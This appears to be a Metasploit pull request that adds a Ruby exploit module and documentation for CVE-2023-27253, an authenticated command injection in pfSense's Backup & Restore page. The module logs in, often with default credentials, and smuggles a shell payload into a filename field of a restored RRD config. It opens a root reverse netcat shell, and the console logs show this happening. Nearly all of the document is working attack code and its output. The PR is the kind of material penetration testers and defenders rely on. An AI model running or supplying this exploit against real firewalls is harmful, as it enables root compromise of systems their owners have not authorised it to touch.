### PR TITLE
CVE-2023-27253 - PfSense 2.6.0 'Backup & Restore' OS Command Injection as root

### DIFF
--- a/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md
+++ b/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md
@@ -1,0 +1,45 @@
+## Description
+
+This module exploits a vulnerability in pfSense version 2.6.0 and before which allows an authenticated user to execute arbitrary operating system commands as root.
+
+## Vulnerable Application
+
+This module has been tested successfully on version 2.6.0-RELEASE
+
+Installers:
+
+* [pfSense 2.6.0-RELEASE](https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz)
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploit/unix/http/pfsense_config_data_exec`
+3. Do: `set RHOST [IP]`
+4. Do: `set USERNAME [username]`
+5. Do: `set PASSWORD [password]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Scenarios
+
+### pfSense Community Edition 2.6.0-RELEASE
+
+```
+msf6 exploit(unix/http/pfsense_config_data_exec) > use exploit/unix/http/pfsense_config_data_exec 
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(unix/http/pfsense_config_data_exec) > set RHOST 1.1.1.1
+RHOST => 1.1.1.1
+msf6 exploit(unix/http/pfsense_config_data_exec) > set LHOST 2.2.2.2
+LHOST => 2.2.2.2
+msf6 exploit(unix/http/pfsense_config_data_exec) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[+] The target is vulnerable.
+[*] Command shell session 8 opened (2.2.2.2:4444 -> 1.1.1.1:21942) at 2023-03-26 02:10:48 +0300
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+```

--- a/modules/exploits/unix/http/pfsense_config_data_exec.rb
+++ b/modules/exploits/unix/http/pfsense_config_data_exec.rb
@@ -1,0 +1,174 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Restore RRD Data Command Injection',
+        'Description' => %q{
+          This module exploits an OS Command Injection vulnerability in the pfSense
+          Config Module (CVE-2023-27253). The vulnerability affects versions <= 2.7.0
+          and can be exploited by an authenticated user if they have the
+          "WebCfg - Diagnostics: Backup & Restore" privilege.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emir Polat', # vulnerability discovery & metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-27253'],
+          ['URL', 'https://redmine.pfsense.org/issues/13935']
+        ],
+        'DisclosureDate' => '2023-03-18',
+        'Platform' => ['unix'],
+        'Arch'           => [ ARCH_CMD ],
+        'Privileged' => true,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'Payload'        =>
+          {
+            'Space'       => 1024,
+            'BadChars'    => "\x2F\x27",
+            'DisableNops' => true,
+            'Compat'      =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'reverse netcat'
+              }
+          },
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+                       OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+                       OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
+                     ]
+
+  end
+
+
+  def check
+    csrf = get_csrf('index.php', nil, 'GET')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'index.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld' => datastore['USERNAME'],
+        'passwordfld' => datastore['PASSWORD'],
+        'login' => ''
+      }
+    )
+
+    @auth_cookies = res.get_cookies
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'diag_backup.php'),
+      'method' => 'GET',
+      'cookie' => @auth_cookies
+    )
+
+    /Diagnostics: (?<backup>)/m =~ res.body
+    if backup and detect_version() != '2.7.0-RELEASE'
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def detect_version
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET',
+      'cookie' => @auth_cookies
+    )
+
+    /Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
+
+    return version
+  end
+
+  def get_csrf(uri, cookies, methods)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + uri),
+      'method' => methods,
+      'cookie' => cookies
+    )
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+
+    return csrf
+  end
+
+  def drop_config
+    csrf = get_csrf('diag_backup.php', @auth_cookies, 'GET')
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, "form-data; name=\"__csrf_magic\"")
+    post_data.add_part("rrddata", nil, nil, "form-data; name=\"backuparea\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"encrypt_password\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"encrypt_password_confirm\"")
+    post_data.add_part("Download configuration as XML", nil, nil, "form-data; name=\"download\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"restorearea\"")
+    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"conffile\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"decrypt_password\"")
+
+
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'diag_backup.php'),
+      'method' => 'POST',
+      'cookie' => @auth_cookies,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+
+    return res.body
+  end
+
+  def exploit
+    csrf = get_csrf('diag_backup.php', @auth_cookies, 'GET')
+
+    config_data = drop_config()
+    /<filename>(?<file>.*?)<\/filename>/ =~ config_data
+    config_data.gsub(" ", "${IFS}")
+    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, "form-data; name=\"__csrf_magic\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"backuparea\"")
+    post_data.add_part("yes", nil, nil, "form-data; name=\"donotbackuprrd\"")
+    post_data.add_part("yes", nil, nil, "form-data; name=\"backupssh\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"encrypt_password\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"encrypt_password_confirm\"")
+    post_data.add_part("rrddata", nil, nil, "form-data; name=\"restorearea\"")
+    post_data.add_part("#{send_p}", "text/xml", nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"decrypt_password\"")
+    post_data.add_part("Restore Configuration", nil, nil, "form-data; name=\"restore\"")
+
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'diag_backup.php'),
+      'method' => 'POST',
+      'cookie' => @auth_cookies,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+
+  end
+end


### PR DESCRIPTION
## Description

This module exploits a vulnerability in pfSense version 2.6.0 and before which allows an authenticated user to execute arbitrary operating system commands as root.

## Vulnerable Application

This module has been tested successfully on version 2.6.0-RELEASE

Installers:

* [pfSense 2.6.0-RELEASE](https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz)


## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/unix/http/pfsense_config_data_exec`
3. Do: `set RHOST [IP]`
4. Do: `set USERNAME [username]`
5. Do: `set PASSWORD [password]`
6. Do: `set LHOST [IP]`
7. Do: `exploit`

## Scenarios

### pfSense Community Edition 2.6.0-RELEASE

```
msf6 exploit(unix/http/pfsense_config_data_exec) > use exploit/unix/http/pfsense_config_data_exec 
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/http/pfsense_config_data_exec) > set RHOST 1.1.1.1
RHOST => 1.1.1.1
msf6 exploit(unix/http/pfsense_config_data_exec) > set LHOST 2.2.2.2
LHOST => 2.2.2.2
msf6 exploit(unix/http/pfsense_config_data_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] pfSense version: 2.6.0-RELEASE
[+] The target is vulnerable.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:21942) at 2023-03-26 02:10:48 +0300

id
uid=0(root) gid=0(wheel) groups=0(wheel)
whoami
root
```
